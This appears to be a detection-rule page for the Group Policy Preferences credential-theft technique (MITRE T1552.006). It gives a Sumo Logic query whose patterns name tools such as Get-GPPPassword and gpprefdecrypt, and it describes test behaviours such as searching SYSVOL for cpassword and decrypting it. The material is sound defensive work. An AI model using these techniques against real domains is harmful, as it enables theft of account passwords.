T1552.006 Sumo Logic CSE · Sumo

Detect Group Policy Preferences in Sumo Logic CSE

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP allows administrators to set local accounts and passwords in Active Directory environments. These credentials are stored in SYSVOL as XML files (Groups.xml, ScheduledTasks.xml, Printers.xml, etc.) with passwords encrypted using AES-256. However, Microsoft publicly released the AES encryption key in 2012 (MS14-025), making any stored cpassword trivially decryptable. Domain users have read access to SYSVOL. Tools include PowerSploit's Get-GPPPassword, Metasploit's post/windows/gather/credentials/gpp module, and gpprefdecrypt.py. APT33, Wizard Spider, and SILENTTRINITY have all used this technique.

MITRE ATT&CK

Tactic
Credential Access
Technique
T1552 Unsecured Credentials
Sub-technique
T1552.006 Group Policy Preferences
Canonical reference
https://attack.mitre.org/techniques/T1552/006/

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql 
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*wineventlog*)
| where EventCode in ("1", "5140", "5145")
// Parse GPP-relevant command-line indicators
| parse regex field=CommandLine "(?i)(?<gpp_keyword>Get-GPPPassword|Get-CachedGPPPassword|Find-GPOPassword|Get-GPPAutologon|Get-SiteListPassword|cpassword|gpprefdecrypt)" nodrop
// Parse SYSVOL XML access pattern from command line
| parse regex field=CommandLine "(?i)(?<sysvol_cmd>SYSVOL)" nodrop
| parse regex field=CommandLine "(?i)(?<xml_ext>\.xml)" nodrop
// Parse GPP XML filenames from share access events
| parse regex field=Object_Name "(?i)(?<gpp_file>Groups\.xml|ScheduledTasks\.xml|DataSources\.xml|Printers\.xml|Services\.xml)" nodrop
// Parse SYSVOL share name
| parse regex field=Share_Name "(?i)(?<sysvol_share>SYSVOL)" nodrop
// Filter: keep only events matching at least one GPP indicator
| where !isNull(gpp_keyword)
    OR (!isNull(sysvol_cmd) AND !isNull(xml_ext))
    OR !isNull(gpp_file)
    OR !isNull(sysvol_share)
// Exclude legitimate system accounts from share-access events
| where !(EventCode in ("5140","5145") AND (Account_Name matches ".*\$$" OR Account_Name = "SYSTEM" OR Account_Name = "ANONYMOUS LOGON"))
// Classify detection pattern
| if (!isNull(gpp_keyword) AND gpp_keyword matches "(?i)Get-GP.*|Find-GPO.*",
      "PowerSploit_GPP",
      if (!isNull(gpp_keyword) AND gpp_keyword = "cpassword",
          "GPP_CpasswordSearch",
          if (!isNull(gpp_keyword) AND gpp_keyword = "gpprefdecrypt",
              "GPP_DecryptionTool",
              if (!isNull(sysvol_cmd) AND !isNull(xml_ext),
                  "GPP_SYSVOLCommandSearch",
                  if (!isNull(gpp_file) OR !isNull(sysvol_share),
                      "GPP_XMLFileAccess",
                      "GPP_Other"))))) as AlertType
| fields _time, host, User, Account_Name, Image, CommandLine, Object_Name, Share_Name, AlertType
| sort by _time desc
high severity high confidence

Detects Group Policy Preferences credential harvesting via Sysmon and Windows Security event sources. Pattern 1 catches PowerSploit GPP module invocations (Get-GPPPassword, Find-GPOPassword, Get-GPPAutologon) and the gpprefdecrypt decryption tool via Sysmon process create events. Pattern 2 identifies direct cpassword string references and SYSVOL+XML command-line combinations indicative of manual or scripted enumeration. Pattern 3 uses Windows Security Events 5140/5145 to detect file-level access to GPP XML credential stores (Groups.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml, Services.xml) via SYSVOL shares. Machine accounts and SYSTEM are excluded from share-access patterns.

Data Sources

Sumo Logic Cloud SIEMSysmon (via Sumo Logic Windows collector)Windows Security Event Log (via Sumo Logic Windows collector)

Required Tables

windows event log sourcessysmon sources

False Positives & Tuning

  • Group Policy infrastructure processes on domain controllers (gpupdate, gpsvc, svchost hosting the Group Policy Client) access SYSVOL XML files during normal policy refresh — these are excluded via machine account filter but check for service accounts not ending in $ that perform legitimate policy reads.
  • Enterprise backup agents (Veeam, Commvault, Veritas) with domain-level access may traverse SYSVOL as part of Active Directory backup procedures — correlate alerts with backup job schedules and service account identities.
  • Red team or purple team exercises executing authorized GPP attack simulations will generate true-positive alerts that must be suppressed — maintain a change management window blocklist correlated with exercise schedules.
Download portable Sigma rule (.yml)

Other platforms for T1552.006

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Search SYSVOL for GPP Credentials with findstr

    Expected signal: Sysmon Event ID 1: findstr.exe with 'cpassword' and SYSVOL. Sysmon Event ID 3: outbound SMB connection to DC (port 445). Security Event ID 5140 on DC: share access to \\*\SYSVOL.

  2. Test 2PowerSploit Get-GPPPassword

    Expected signal: Sysmon Event ID 1: powershell.exe with Get-GPPPassword and DownloadString. Sysmon Event ID 3: connection to SYSVOL on DC (port 445) AND outbound to GitHub for download. PowerShell ScriptBlock Log Event ID 4104 with Get-GPPPassword function.

  3. Test 3Enumerate GPP XML Files in SYSVOL

    Expected signal: Sysmon Event ID 1: cmd.exe with 'dir /s' and SYSVOL. Sysmon Event ID 3: SMB connection to DC. Security Event ID 5140 on DC: SYSVOL share access.

  4. Test 4Decrypt GPP cpassword with Python

    Expected signal: Sysmon Event ID 1: powershell.exe with AesManaged and cpassword in command line. PowerShell ScriptBlock Log Event ID 4104 showing the AES decryption logic.

Last updated: 2026-04-13 Research depth: deep
References (7)

Unlock Pro Content

Get the full detection package for T1552.006 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1552Unsecured Credentials

Related Sub-techniques

T1552.001Credentials In FilesT1552.002Credentials in RegistryT1552.003Bash HistoryT1552.004Private KeysT1552.005Cloud Instance Metadata APIT1552.007Container APIT1552.008Chat Messages

Related Techniques

T1552Unsecured CredentialsT1552.001Credentials In FilesT1552.002Credentials in RegistryT1135Network Share DiscoveryT1021.002SMB/Windows Admin SharesT1078.002Domain AccountsT1484.001Group Policy Modification

Same Tactic: Credential Access

Popular Detections